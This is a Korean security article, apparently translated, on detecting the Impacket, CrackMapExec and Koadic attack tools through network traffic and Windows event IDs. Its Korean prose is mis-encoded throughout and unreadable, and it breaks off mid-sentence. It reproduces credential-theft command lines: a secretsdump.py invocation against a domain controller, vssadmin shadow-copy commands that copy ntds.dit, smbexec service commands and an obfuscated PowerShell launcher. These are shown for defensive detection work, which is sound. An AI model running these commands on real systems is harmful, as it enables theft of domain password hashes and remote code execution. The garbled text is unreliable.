๊ธฐ์
๋ถ๋ฌธ์ ๊ณต๊ฒฉ ๊ฑด์๋ ๋งค๋
์ฆ๊ฐํ๊ณ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด
์ด๋ฌํ ๋๊ตฌ๋ ์ด๊ธฐ ์นจํฌ์ ์ฌ์ฉ๋์ง ์๊ณ ์ธํ๋ผ ๋ด์์ ๊ณต๊ฒฉ์ ๊ฐ๋ฐํ๋ ๋ฐ ์ฌ์ฉ๋๋ค๋ ์ ์ ์ฃผ๋ชฉํ ๊ฐ์น๊ฐ ์์ต๋๋ค. ๊ณต๊ฒฉ์๋ ๊ฒฝ๊ณ ์นจํฌ ์ดํ ๋ค์ํ ๊ณต๊ฒฉ ๋จ๊ณ์์ ์ด๋ฅผ ์ฌ์ฉํฉ๋๋ค. ๊ทธ๊ฑด ๊ทธ๋ ๊ณ , ์ด๊ฒ์ ๊ฐ์งํ๊ธฐ ์ด๋ ต๊ณ ์ข
์ข
๊ธฐ์ ์ ๋์์ ํตํด์๋ง ๊ฐ๋ฅํฉ๋๋ค.
์ฐ๋ฆฌ๊ฐ ํด์ผ ํ ์ผ:
- ํดํน ๋๊ตฌ์ ์๋ ๋ฐฉ์ ์ดํด. ๊ณต๊ฒฉ์๊ฐ ์ ์ฉํด์ผ ํ ์ฌํญ๊ณผ ์ฌ์ฉํ ์ ์๋ ๊ธฐ์ ์ด ๋ฌด์์ธ์ง ์์๋ณด์ธ์.
- ๊ณต๊ฒฉ ์ด๊ธฐ ๋จ๊ณ์์ ์ ๋ณด ๋ณด์ ๋๊ตฌ๋ก ํ์ง๋์ง ์์ ๋ด์ฉ์ ์ฐพ์๋ณด์ธ์.. ๊ณต๊ฒฉ์๊ฐ ๋ด๋ถ ๊ณต๊ฒฉ์์ด๊ฑฐ๋ ๊ณต๊ฒฉ์๊ฐ ์ด์ ์ ์๋ ค์ง์ง ์์๋ ์ธํ๋ผ์ ํ์ ์ ์ ์ฉํ๊ณ ์๊ธฐ ๋๋ฌธ์ ์ ์ฐฐ ๋จ๊ณ๋ฅผ ๊ฑด๋๋ธ ์ ์์ต๋๋ค. ๊ทธ์ ํ๋์ ์ ์ฒด ์ฒด์ธ์ ๋ณต์ํ๋ ๊ฒ์ด ๊ฐ๋ฅํด ์ง๋ฏ๋ก ์ถ๊ฐ ์์ง์์ ๊ฐ์งํ๋ ค๋ ์๊ตฌ๊ฐ ์๊น๋๋ค.
- ์นจ์ ํ์ง ๋๊ตฌ์์ ์คํ์ง ์ ๊ฑฐ. ์ ์ฐฐ๋ง์ผ๋ก ํน์ ๋์์ด ๊ฐ์ง๋๋ฉด ๋น๋ฒํ ์ค๋ฅ๊ฐ ๋ฐ์ํ ์ ์๋ค๋ ์ ์ ์์ง ๋ง์์ผ ํฉ๋๋ค. ์ผ๋ฐ์ ์ผ๋ก ์ธํ๋ผ์๋ ์ ๋ณด๋ฅผ ์ป๊ธฐ ์ํ ์ถฉ๋ถํ ์์ ๋ฐฉ๋ฒ์ด ์์ผ๋ฉฐ ์ธ๋ป ๋ณด๋ฉด ํฉ๋ฒ์ ์ธ ๋ฐฉ๋ฒ๊ณผ ๊ตฌ๋ณํ ์ ์์ต๋๋ค.
์ด๋ฌํ ๋๊ตฌ๋ ๊ณต๊ฒฉ์์๊ฒ ๋ฌด์์ ์ ๊ณตํฉ๋๊น? ์ด๊ฒ์ด Impacket์ด๋ผ๋ฉด ๊ณต๊ฒฉ์๋ ๊ฒฝ๊ณ๋ฅผ ๋ฌด๋๋จ๋ฆฐ ํ ์ด์ด์ง๋ ๊ณต๊ฒฉ์ ๋ค์ํ ๋จ๊ณ์์ ์ฌ์ฉํ ์ ์๋ ๋๊ท๋ชจ ๋ชจ๋ ๋ผ์ด๋ธ๋ฌ๋ฆฌ๋ฅผ ๋ฐ๊ฒ ๋ฉ๋๋ค. Metasploit๊ณผ ๊ฐ์ ๋ง์ ๋๊ตฌ๋ Impacket ๋ชจ๋์ ๋ด๋ถ์ ์ผ๋ก ์ฌ์ฉํฉ๋๋ค. ์๊ฒฉ ๋ช ๋ น ์คํ์ ์ํ dcomexec ๋ฐ wmiexec, Impacket์์ ์ถ๊ฐ๋ ๋ฉ๋ชจ๋ฆฌ์์ ๊ณ์ ์ ๊ฐ์ ธ์ค๊ธฐ ์ํ secretsdump๊ฐ ์์ต๋๋ค. ๊ฒฐ๊ณผ์ ์ผ๋ก, ๊ทธ๋ฌํ ๋ผ์ด๋ธ๋ฌ๋ฆฌ์ ํ๋์ ์ฌ๋ฐ๋ฅด๊ฒ ๊ฐ์งํ๋ฉด ํ์ ์ํ๋ ๊ฐ์ง๋ ์ ์์ต๋๋ค.
์ ์์๊ฐ CrackMapExec(๋๋ ๊ฐ๋จํ CME)์ ๋ํด "Powered by Impacket"์ ์ด ๊ฒ์ ์ฐ์ฐ์ด ์๋๋๋ค. ๋ํ CME์๋ ๋น๋ฐ๋ฒํธ ๋๋ ํด์๋ฅผ ์ป๊ธฐ ์ํ Mimikatz, ์๊ฒฉ ์คํ์ ์ํ Meterpreter ๋๋ Empire ์์ด์ ํธ ๊ตฌํ, Bloodhound ํ์ฌ ๋ฑ ๋๋ฆฌ ์ฌ์ฉ๋๋ ์๋๋ฆฌ์ค๋ฅผ ์ํ ๊ธฐ์ฑ ๊ธฐ๋ฅ์ด ์์ต๋๋ค.
์ฐ๋ฆฌ๊ฐ ์ ํํ ์ธ ๋ฒ์งธ ๋๊ตฌ๋ Koadic์ด์์ต๋๋ค. ์ด๋ ๋งค์ฐ ์ต๊ทผ์ ๊ฒ์ผ๋ก 25๋ ๊ตญ์ ํด์ปค ์ปจํผ๋ฐ์ค DEFCON 2017์์ ๋ฐํ๋์์ผ๋ฉฐ ๋นํ์ค ์ ๊ทผ ๋ฐฉ์์ผ๋ก ๊ตฌ๋ณ๋ฉ๋๋ค. ์ด๋ HTTP, Java Script ๋ฐ Microsoft Visual Basic Script(VBS)๋ฅผ ํตํด ์๋ํฉ๋๋ค. ์ด ์ ๊ทผ ๋ฐฉ์์ Living off the land๋ผ๊ณ ํฉ๋๋ค. ์ด ๋๊ตฌ๋ Windows์ ๋ด์ฅ๋ ์ข ์์ฑ ๋ฐ ๋ผ์ด๋ธ๋ฌ๋ฆฌ ์ธํธ๋ฅผ ์ฌ์ฉํฉ๋๋ค. ์ ์์๋ ์ด๋ฅผ COM Command & Control ๋๋ C3์ด๋ผ๊ณ ๋ถ๋ฆ ๋๋ค.
์ถฉ๊ฒฉ
Impacket์ ๊ธฐ๋ฅ์ AD ๋ด๋ถ ์ ์ฐฐ, ๋ด๋ถ MS SQL ์๋ฒ์์ ๋ฐ์ดํฐ ์์ง, ์๊ฒฉ ์ฆ๋ช ํ๋ ๊ธฐ์ (SMB ๋ฆด๋ ์ด ๊ณต๊ฒฉ, ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ์์ ์ฌ์ฉ์ ๋น๋ฐ๋ฒํธ ํด์๊ฐ ํฌํจ๋ ntds.dit ํ์ผ ํ๋)์ ์ด๋ฅด๊ธฐ๊น์ง ๋งค์ฐ ๊ด๋ฒ์ํฉ๋๋ค. ๋ํ Impacket์ WMI, Windows ์ค์ผ์ค๋ฌ ๊ด๋ฆฌ ์๋น์ค, DCOM ๋ฐ SMB์ ๋ค ๊ฐ์ง ๋ฐฉ๋ฒ์ ์ฌ์ฉํ์ฌ ์๊ฒฉ์ผ๋ก ๋ช ๋ น์ ์คํํ๋ฉฐ ์ด๋ฅผ ์ํด์๋ ์๊ฒฉ ์ฆ๋ช ์ด ํ์ํฉ๋๋ค.
๋น๋ฐ ๋คํ
secretsdump๋ฅผ ์ดํด๋ณด๊ฒ ์ต๋๋ค. ์ด๋ ์ฌ์ฉ์ ์ปดํจํฐ์ ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ๋ฅผ ๋ชจ๋ ๋์์ผ๋ก ํ ์ ์๋ ๋ชจ๋์ ๋๋ค. LSA, SAM, SECURITY, NTDS.dit ๋ฉ๋ชจ๋ฆฌ ์์ญ์ ๋ณต์ฌ๋ณธ์ ์ป๋ ๋ฐ ์ฌ์ฉํ ์ ์์ผ๋ฏ๋ก ๊ณต๊ฒฉ์ ๋ค์ํ ๋จ๊ณ์์ ๋ณผ ์ ์์ต๋๋ค. ๋ชจ๋ ์์ ์ ์ฒซ ๋ฒ์งธ ๋จ๊ณ๋ SMB๋ฅผ ํตํ ์ธ์ฆ์ผ๋ก, Pass the Hash ๊ณต๊ฒฉ์ ์๋์ผ๋ก ์ํํ๋ ค๋ฉด ์ฌ์ฉ์์ ๋น๋ฐ๋ฒํธ๋ ํด์๊ฐ ํ์ํฉ๋๋ค. ๋ค์์ผ๋ก SCM(์๋น์ค ์ ์ด ๊ด๋ฆฌ์)์ ๋ํ ์ก์ธ์ค๋ฅผ ์ด๊ณ winreg ํ๋กํ ์ฝ์ ํตํด ๋ ์ง์คํธ๋ฆฌ์ ์ก์ธ์คํ๋ผ๋ ์์ฒญ์ด ๋์ต๋๋ค. ์ด๋ฅผ ์ฌ์ฉํ์ฌ ๊ณต๊ฒฉ์๋ ๊ด์ฌ ์๋ ๋ถ๊ธฐ์ ๋ฐ์ดํฐ๋ฅผ ์ฐพ๊ณ SMB๋ฅผ ํตํด ๊ฒฐ๊ณผ๋ฅผ ์ป์ ์ ์์ต๋๋ค.
๊ทธ๋ฆผ์์. 1์์๋ winreg ํ๋กํ ์ฝ์ ์ฌ์ฉํ ๋ LSA๊ฐ ์๋ ๋ ์ง์คํธ๋ฆฌ ํค๋ฅผ ์ฌ์ฉํ์ฌ ์ก์ธ์คํ๋ ๋ฐฉ๋ฒ์ ์ ํํ ํ์ธํฉ๋๋ค. ์ด๋ ๊ฒ ํ๋ ค๋ฉด opcode 15 - OpenKey์ ํจ๊ป DCERPC ๋ช ๋ น์ ์ฌ์ฉํ์ญ์์ค.
์. 1. winreg ํ๋กํ ์ฝ์ ์ฌ์ฉํ์ฌ ๋ ์ง์คํธ๋ฆฌ ํค ์ด๊ธฐ
๋ค์์ผ๋ก ํค์ ๋ํ ์ก์ธ์ค๊ฐ ํ๋๋๋ฉด Opcode 20๊ณผ ํจ๊ป SaveKey ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ๊ฐ์ด ์ ์ฅ๋ฉ๋๋ค. Impacket์ ์ด๋ฅผ ๋งค์ฐ ๊ตฌ์ฒด์ ์ธ ๋ฐฉ์์ผ๋ก ์ํํฉ๋๋ค. .tmp๊ฐ ์ถ๊ฐ๋ ์์์ 8๊ฐ ๋ฌธ์๋ก ๊ตฌ์ฑ๋ ๋ฌธ์์ด ์ด๋ฆ์ ๊ฐ์ง ํ์ผ์ ๊ฐ์ ์ ์ฅํฉ๋๋ค. ๋ํ ์ด ํ์ผ์ System32 ๋๋ ํฐ๋ฆฌ์์ SMB๋ฅผ ํตํด ์ถ๊ฐ๋ก ์ ๋ก๋๋ฉ๋๋ค(๊ทธ๋ฆผ 2).
์. 2. ์๊ฒฉ ์์คํ
์์ ๋ ์ง์คํธ๋ฆฌ ํค๋ฅผ ์ป๋ ๋ฐฉ๋ฒ
๋คํธ์ํฌ์์์ ์ด๋ฌํ ํ๋์ winreg ํ๋กํ ์ฝ, ํน์ ์ด๋ฆ, ๋ช ๋ น ๋ฐ ์์๋ฅผ ์ฌ์ฉํ์ฌ ํน์ ๋ ์ง์คํธ๋ฆฌ ๋ถ๊ธฐ์ ๋ํ ์ฟผ๋ฆฌ๋ฅผ ํตํด ๊ฐ์งํ ์ ์๋ ๊ฒ์ผ๋ก ๋ํ๋ฌ์ต๋๋ค.
๋ํ ์ด ๋ชจ๋์ Windows ์ด๋ฒคํธ ๋ก๊ทธ์ ์ถ์ ์ ๋จ๊ธฐ๋ฏ๋ก ์ฝ๊ฒ ๊ฐ์งํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด, ๋ช ๋ น์ ์คํํ ๊ฒฐ๊ณผ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 ๋ก๊ทธ์๋ ๋ค์๊ณผ ๊ฐ์ ์ฃผ์ ์ด๋ฒคํธ ์์๊ฐ ํ์๋ฉ๋๋ค.
1. 4624 - ์๊ฒฉ ๋ก๊ทธ์จ.
2. 5145 - winreg ์๊ฒฉ ์๋น์ค์ ๋ํ ์ก์ธ์ค ๊ถํ์ ํ์ธํฉ๋๋ค.
3. 5145 - System32 ๋๋ ํฐ๋ฆฌ์์ ํ์ผ ์ก์ธ์ค ๊ถํ์ ํ์ธํฉ๋๋ค. ํ์ผ์๋ ์์์ ์ธ๊ธํ ์์์ ์ด๋ฆ์ด ์์ต๋๋ค.
4. 4688 - vssadmin์ ์์ํ๋ cmd.exe ํ๋ก์ธ์ค ์์ฑ:
โC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ๋ค์ ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ํ๋ก์ธ์ค๋ฅผ ์์ฑํฉ๋๋ค.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - ๋ค์ ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ํ๋ก์ธ์ค๋ฅผ ์์ฑํฉ๋๋ค.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - ๋ค์ ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ํ๋ก์ธ์ค๋ฅผ ์์ฑํฉ๋๋ค.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
์ค์ ๋ฒก์น
๋ง์ ๊ณต๊ฒฉ ํ ๋๊ตฌ์ ๋ง์ฐฌ๊ฐ์ง๋ก Impacket์๋ ๋ช ๋ น์ ์๊ฒฉ์ผ๋ก ์คํํ๊ธฐ ์ํ ๋ชจ๋์ด ์์ต๋๋ค. ์๊ฒฉ ์์คํ ์์ ๋ํํ ๋ช ๋ น ์ ธ์ ์ ๊ณตํ๋ smbexec์ ์ค์ ์ ๋ ๊ฒ์ ๋๋ค. ์ด ๋ชจ๋์๋ ๋น๋ฐ๋ฒํธ ๋๋ ๋น๋ฐ๋ฒํธ ํด์๋ฅผ ์ฌ์ฉํ์ฌ SMB๋ฅผ ํตํ ์ธ์ฆ๋ ํ์ํฉ๋๋ค. ๊ทธ๋ฆผ์์. ๊ทธ๋ฆผ 3์์๋ ์ด๋ฌํ ๋๊ตฌ์ ์๋ ๋ฐฉ์์ ๋ํ ์๋ฅผ ๋ณผ ์ ์์ต๋๋ค. ์ด ๊ฒฝ์ฐ์๋ ๋ก์ปฌ ๊ด๋ฆฌ์ ์ฝ์์ ๋๋ค.
์. 3. ๋ํํ smbexec ์ฝ์
์ธ์ฆ ํ smbexec์ ์ฒซ ๋ฒ์งธ ๋จ๊ณ๋ OpenSCManagerW ๋ช ๋ น(15)์ ์ฌ์ฉํ์ฌ SCM์ ์ฌ๋ ๊ฒ์ ๋๋ค. ์ฟผ๋ฆฌ๋ ์ฃผ๋ชฉํ ๋งํฉ๋๋ค. MachineName ํ๋๋ DUMMY์ ๋๋ค.
์. 4. ์๋น์ค ์ ์ด ๊ด๋ฆฌ์ ์ด๊ธฐ ์์ฒญ
๋ค์์ผ๋ก CreateServiceW ๋ช ๋ น(12)์ ์ฌ์ฉํ์ฌ ์๋น์ค๊ฐ ์์ฑ๋ฉ๋๋ค. smbexec์ ๊ฒฝ์ฐ ๋งค๋ฒ ๋์ผํ ๋ช ๋ น ๊ตฌ์ฑ ๋ ผ๋ฆฌ๋ฅผ ๋ณผ ์ ์์ต๋๋ค. ๊ทธ๋ฆผ์์. 5 ๋ น์์ ๋ณ๊ฒฝํ ์ ์๋ ๋ช ๋ น ๋งค๊ฐ๋ณ์๋ฅผ ๋ํ๋ด๊ณ ๋ ธ๋์์ ๊ณต๊ฒฉ์๊ฐ ๋ณ๊ฒฝํ ์ ์๋ ํญ๋ชฉ์ ๋ํ๋ ๋๋ค. ์คํ ํ์ผ์ ์ด๋ฆ, ํด๋น ๋๋ ํฐ๋ฆฌ ๋ฐ ์ถ๋ ฅ ํ์ผ์ ๋ณ๊ฒฝํ ์ ์๋ค๋ ๊ฒ์ ์ฝ๊ฒ ์ ์ ์์ง๋ง Impacket ๋ชจ๋์ ๋ ผ๋ฆฌ๋ฅผ ๋ฐฉํดํ์ง ์๊ณ ๋๋จธ์ง๋ ๋ณ๊ฒฝํ๊ธฐ๊ฐ ํจ์ฌ ์ด๋ ต์ต๋๋ค.
์. 5. Service Control Manager๋ฅผ ์ด์ฉํ์ฌ ์๋น์ค ์์ฑ ์์ฒญ
Smbexec์ ๋ํ Windows ์ด๋ฒคํธ ๋ก๊ทธ์ ๋ช ๋ฐฑํ ํ์ ์ ๋จ๊น๋๋ค. ipconfig ๋ช ๋ น์ ์ฌ์ฉํ๋ ๋ํํ ๋ช ๋ น ์ ธ์ ๋ํ Windows Server 2016 ๋ก๊ทธ์๋ ๋ค์๊ณผ ๊ฐ์ ์ฃผ์ ์ด๋ฒคํธ ์ํ์ค๊ฐ โโํ์๋ฉ๋๋ค.
1. 4697 โ ํผํด์์ ์ปดํจํฐ์ ์๋น์ค ์ค์น:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ์ง์ 1์ ์ธ์๋ฅผ ์ฌ์ฉํ์ฌ cmd.exe ํ๋ก์ธ์ค๋ฅผ ์์ฑํฉ๋๋ค.
3. 5145 - C$ ๋๋ ํฐ๋ฆฌ์ __output ํ์ผ์ ๋ํ ์ก์ธ์ค ๊ถํ์ ํ์ธํฉ๋๋ค.
4. 4697 โ ํผํด์์ ์ปดํจํฐ์ ์๋น์ค ์ค์น.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ์ง์ 4์ ์ธ์๋ฅผ ์ฌ์ฉํ์ฌ cmd.exe ํ๋ก์ธ์ค๋ฅผ ์์ฑํฉ๋๋ค.
6. 5145 - C$ ๋๋ ํฐ๋ฆฌ์ __output ํ์ผ์ ๋ํ ์ก์ธ์ค ๊ถํ์ ํ์ธํฉ๋๋ค.
Impacket์ ๊ณต๊ฒฉ ๋๊ตฌ ๊ฐ๋ฐ์ ๊ธฐ๋ฐ์ด ๋ฉ๋๋ค. ์ด๋ Windows ์ธํ๋ผ์ ๊ฑฐ์ ๋ชจ๋ ํ๋กํ ์ฝ์ ์ง์ํ๋ ๋์์ ๊ณ ์ ํ ํน์ง์ ๊ฐ์ง๊ณ ์์ต๋๋ค. ์ฌ๊ธฐ์๋ ํน์ winreg ์์ฒญ, ํน์ง์ ์ธ ๋ช ๋ น ๊ตฌ์ฑ์ ๊ฐ์ถ SCM API ์ฌ์ฉ, ํ์ผ ์ด๋ฆ ํ์, SMB ๊ณต์ SYSTEM32๊ฐ ๋์ ์์ต๋๋ค.
CRACKMAPEXEC
CME ๋๊ตฌ๋ ์ฃผ๋ก ๊ณต๊ฒฉ์๊ฐ ๋คํธ์ํฌ ๋ด์์ ๋ฐ์ ํ๊ธฐ ์ํด ์ํํด์ผ ํ๋ ์ผ์์ ์ธ ์์ ์ ์๋ํํ๋๋ก ์ค๊ณ๋์์ต๋๋ค. ์ด๋ฅผ ํตํด ์ ์๋ ค์ง Empire ์์ด์ ํธ ๋ฐ Meterpreter์ ํจ๊ป ์์ ํ ์ ์์ต๋๋ค. ๋ช ๋ น์ ์๋ฐํ๊ฒ ์คํํ๊ธฐ ์ํด CME๋ ๋ช ๋ น์ ๋๋ ํํ ์ ์์ต๋๋ค. ๊ณต๊ฒฉ์๋ Bloodhound(๋ณ๋ ์ ์ฐฐ ๋๊ตฌ)๋ฅผ ์ฌ์ฉํ์ฌ ํ์ฑ ๋๋ฉ์ธ ๊ด๋ฆฌ์ ์ธ์ ๊ฒ์์ ์๋ํํ ์ ์์ต๋๋ค.
๋ธ๋ฌ๋ ํ์ด๋
๋ ๋ฆฝํ ๋๊ตฌ์ธ Bloodhound๋ฅผ ์ฌ์ฉํ๋ฉด ๋คํธ์ํฌ ๋ด์์ ๊ณ ๊ธ ์ ์ฐฐ์ด ๊ฐ๋ฅํฉ๋๋ค. ์ฌ์ฉ์, ์ปดํจํฐ, ๊ทธ๋ฃน, ์ธ์ ์ ๋ํ ๋ฐ์ดํฐ๋ฅผ ์์งํ๋ฉฐ PowerShell ์คํฌ๋ฆฝํธ ๋๋ ๋ฐ์ด๋๋ฆฌ ํ์ผ๋ก ์ ๊ณต๋ฉ๋๋ค. ์ ๋ณด๋ฅผ ์์งํ๋ ๋ฐ๋ LDAP ๋๋ SMB ๊ธฐ๋ฐ ํ๋กํ ์ฝ์ด ์ฌ์ฉ๋ฉ๋๋ค. CME ํตํฉ ๋ชจ๋์ ์ฌ์ฉํ๋ฉด Bloodhound๋ฅผ ํผํด์์ ์ปดํจํฐ์ ๋ค์ด๋ก๋ํ๊ณ ์คํํ ํ ์์ง๋ ๋ฐ์ดํฐ๋ฅผ ์คํํ๊ณ ์์ ํ ์ ์์ผ๋ฏ๋ก ์์คํ ์ ์์ ์ ์๋ํํ๊ณ ๋์ ๋์ง ์๊ฒ ๋ง๋ค ์ ์์ต๋๋ค. Bloodhound ๊ทธ๋ํฝ ์ ธ์ ์์ง๋ ๋ฐ์ดํฐ๋ฅผ ๊ทธ๋ํ ํ์์ผ๋ก ํ์ํ๋ฏ๋ก ๊ณต๊ฒฉ์์ ์ปดํจํฐ์์ ๋๋ฉ์ธ ๊ด๋ฆฌ์๊น์ง์ ์ต๋จ ๊ฒฝ๋ก๋ฅผ ์ฐพ์ ์ ์์ต๋๋ค.
์. 6. ๋ธ๋ฌ๋ํ์ด๋ ์ธํฐํ์ด์ค
ํผํด์์ ์ปดํจํฐ์์ ์คํํ๊ธฐ ์ํด ๋ชจ๋์ ATSVC ๋ฐ SMB๋ฅผ ์ฌ์ฉํ์ฌ ์์ ์ ์์ฑํฉ๋๋ค. ATSVC๋ Windows ์์ ์ค์ผ์ค๋ฌ ์์ ์ ์ํ ์ธํฐํ์ด์ค์ ๋๋ค. CME๋ NetrJobAdd(1) ๊ธฐ๋ฅ์ ์ฌ์ฉํ์ฌ ๋คํธ์ํฌ๋ฅผ ํตํด ์์ ์ ์์ฑํฉ๋๋ค. CME ๋ชจ๋์ด ๋ณด๋ด๋ ๋ด์ฉ์ ์๊ฐ ๊ทธ๋ฆผ 7์ ๋์ ์์ต๋๋ค. XNUMX: ์ด๊ฒ์ XML ํ์์ ์ธ์ ํํ๋ก ๋ cmd.exe ๋ช ๋ น ํธ์ถ ๋ฐ ๋๋ ํ๋ ์ฝ๋์ ๋๋ค.
๊ทธ๋ฆผ 7. CME๋ฅผ ํตํด ์์
์์ฑ
์คํ์ ์ํด ์์ ์ด ์ ์ถ๋ ํ ํผํด์์ ์ปดํจํฐ๋ Bloodhound ์์ฒด๋ฅผ ์์ํ๋ฉฐ ์ด๋ ํธ๋ํฝ์์ ๋ณผ ์ ์์ต๋๋ค. ์ด ๋ชจ๋์ ํ์ค ๊ทธ๋ฃน, ๋๋ฉ์ธ์ ๋ชจ๋ ์์คํ ๋ฐ ์ฌ์ฉ์ ๋ชฉ๋ก์ ์ป๊ณ SRVSVC NetSessEnum ์์ฒญ์ ํตํด ํ์ฑ ์ฌ์ฉ์ ์ธ์ ์ ๋ํ ์ ๋ณด๋ฅผ ์ป๋ LDAP ์ฟผ๋ฆฌ๊ฐ ํน์ง์ ๋๋ค.
์. 8. SMB๋ฅผ ํตํด ํ์ฑ ์ธ์
๋ชฉ๋ก ์ป๊ธฐ
๋ํ ๊ฐ์ฌ๊ฐ ํ์ฑํ๋ ํผํด์ ์ปดํจํฐ์์ Bloodhound๋ฅผ ์์ํ๋ฉด ID 4688(ํ๋ก์ธ์ค ์์ฑ) ๋ฐ ํ๋ก์ธ์ค ์ด๋ฆ์ด ํฌํจ๋ ์ด๋ฒคํธ๊ฐ ์๋ฐ๋ฉ๋๋ค. ยซC:WindowsSystem32cmd.exeยป
. ์ฃผ๋ชฉํ ๋งํ ์ ์ ๋ช
๋ น์ค ์ธ์์
๋๋ค.
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โฆ , 40,41 )-jOIN'' ) "
Enum_avproducts
enum_avproducts ๋ชจ๋์ ๊ธฐ๋ฅ ๋ฐ ๊ตฌํ ์ธก๋ฉด์์ ๋งค์ฐ ํฅ๋ฏธ๋กญ์ต๋๋ค. WMI๋ฅผ ์ฌ์ฉํ๋ฉด WQL ์ฟผ๋ฆฌ ์ธ์ด๋ฅผ ์ฌ์ฉํ์ฌ ๋ค์ํ Windows ๊ฐ์ฒด์์ ๋ฐ์ดํฐ๋ฅผ ๊ฒ์ํ ์ ์์ผ๋ฉฐ, ์ด๋ ๊ธฐ๋ณธ์ ์ผ๋ก ์ด CME ๋ชจ๋์์ ์ฌ์ฉ๋ฉ๋๋ค. ํผํด์์ ์ปดํจํฐ์ ์ค์น๋ ๋ณดํธ ๋๊ตฌ์ ๋ํด AntiSpywareProduct ๋ฐ AntiMirusProduct ํด๋์ค์ ๋ํ ์ฟผ๋ฆฌ๋ฅผ ์์ฑํฉ๋๋ค. ํ์ํ ๋ฐ์ดํฐ๋ฅผ ์ป๊ธฐ ์ํด ๋ชจ๋์ rootSecurityCenter2 ๋ค์์คํ์ด์ค์ ์ฐ๊ฒฐํ ๋ค์ WQL ์ฟผ๋ฆฌ๋ฅผ ์์ฑํ๊ณ ์๋ต์ ๋ฐ์ต๋๋ค. ๊ทธ๋ฆผ์์. ๊ทธ๋ฆผ 9๋ ์ด๋ฌํ ์์ฒญ๊ณผ ์๋ต์ ๋ด์ฉ์ ๋ณด์ฌ์ค๋๋ค. ์ด ์์์๋ Windows Defender๊ฐ ๋ฐ๊ฒฌ๋์์ต๋๋ค.
์. 9. enum_avproducts ๋ชจ๋์ ๋คํธ์ํฌ ํ๋
์ด๋ฒคํธ์์ WQL ์ฟผ๋ฆฌ์ ๋ํ ์ ์ฉํ ์ ๋ณด๋ฅผ ์ฐพ์ ์ ์๋ WMI ๊ฐ์ฌ(WMI-Activity ์ถ์ )๊ฐ ๋นํ์ฑํ๋๋ ๊ฒฝ์ฐ๊ฐ ์ข ์ข ์์ต๋๋ค. ๊ทธ๋ฌ๋ ํ์ฑํ๋ ๊ฒฝ์ฐ enum_avproducts ์คํฌ๋ฆฝํธ๊ฐ ์คํ๋๋ฉด ID 11์ ์ด๋ฒคํธ๊ฐ ์ ์ฅ๋๋ฉฐ ์ฌ๊ธฐ์๋ ์์ฒญ์ ๋ณด๋ธ ์ฌ์ฉ์์ ์ด๋ฆ๊ณผ rootSecurityCenter2 ๋ค์์คํ์ด์ค์ ์ด๋ฆ์ด ํฌํจ๋ฉ๋๋ค.
๊ฐ CME ๋ชจ๋์๋ ํน์ WQL ์ฟผ๋ฆฌ ๋๋ LDAP ๋ฐ SMB์ ๋๋ ํ ๋ฐ Bloodhound ๊ด๋ จ ํ๋์ ์ฌ์ฉํ์ฌ ์์ ์ค์ผ์ค๋ฌ์์ ํน์ ์ ํ์ ์์ ์์ฑ ๋ฑ ์์ฒด ์ํฐํฉํธ๊ฐ ์์ต๋๋ค.
KOADIC
Koadic์ ๋ ํนํ ํน์ง์ Windows์ ๋ด์ฅ๋ JavaScript ๋ฐ VBScript ์ธํฐํ๋ฆฌํฐ๋ฅผ ์ฌ์ฉํ๋ค๋ ๊ฒ์ ๋๋ค. ์ด๋ฌํ ์๋ฏธ์์ ์ด๋ ํ ์ง์ ์์กดํ์ง ์๊ณ ์ํํ๋ ๊ฒฝํฅ์ ๋ฐ๋ฆ ๋๋ค. ์ฆ, ์ธ๋ถ ์ข ์์ฑ์ด ์์ผ๋ฉฐ ํ์ค Windows ๋๊ตฌ๋ฅผ ์ฌ์ฉํฉ๋๋ค. ๊ฐ์ผ ํ ๊ธฐ๊ณ์ "์ํ๋ํธ"๊ฐ ์ค์น๋์ด ์ ์ด๊ฐ ๊ฐ๋ฅํ๋ฏ๋ก ์ด๋ ์์ ํ ๋ช ๋ น ๋ฐ ์ ์ด(CnC)๋ฅผ ์ํ ๋๊ตฌ์ ๋๋ค. Koadic ์ฉ์ด๋ก ์ด๋ฌํ ๊ธฐ๊ณ๋ฅผ "์ข๋น"๋ผ๊ณ ํฉ๋๋ค. ํผํด์ ์ธก์์ ์ ์ฒด ์์ ์ ์ํํ 